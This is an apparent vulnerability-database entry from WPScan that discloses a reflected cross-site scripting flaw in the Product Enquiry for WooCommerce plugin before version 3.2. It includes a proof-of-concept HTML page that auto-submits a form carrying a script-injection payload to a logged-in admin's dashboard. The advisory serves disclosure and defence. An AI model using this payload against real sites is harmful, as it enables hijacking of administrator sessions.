Lucene search

K
wpexploitErwan LR (WPscan)WPEX-ID:4992A4A9-F21A-46E2-BABF-954ACFC7C5B4
HistoryJan 08, 2024 - 12:00 a.m.

Product Enquiry for WooCommerce < 3.2 - Reflected XSS

2024-01-0800:00:00
Erwan LR (WPscan)
48
woocommerce
reflected xss
admin
exploit
form submission

EPSS

0.001

Percentile

17.0%

Description The plugin does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Make a logged in admin open a page with the code below

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=GMWQP&view=list" method="POST">
        <input type="text" name="page" value='"><script>alert(/XSS/)</script>'>
        <input type="submit" value="submit">
    </form>
</body>

EPSS

0.001

Percentile

17.0%

Related for WPEX-ID:4992A4A9-F21A-46E2-BABF-954ACFC7C5B4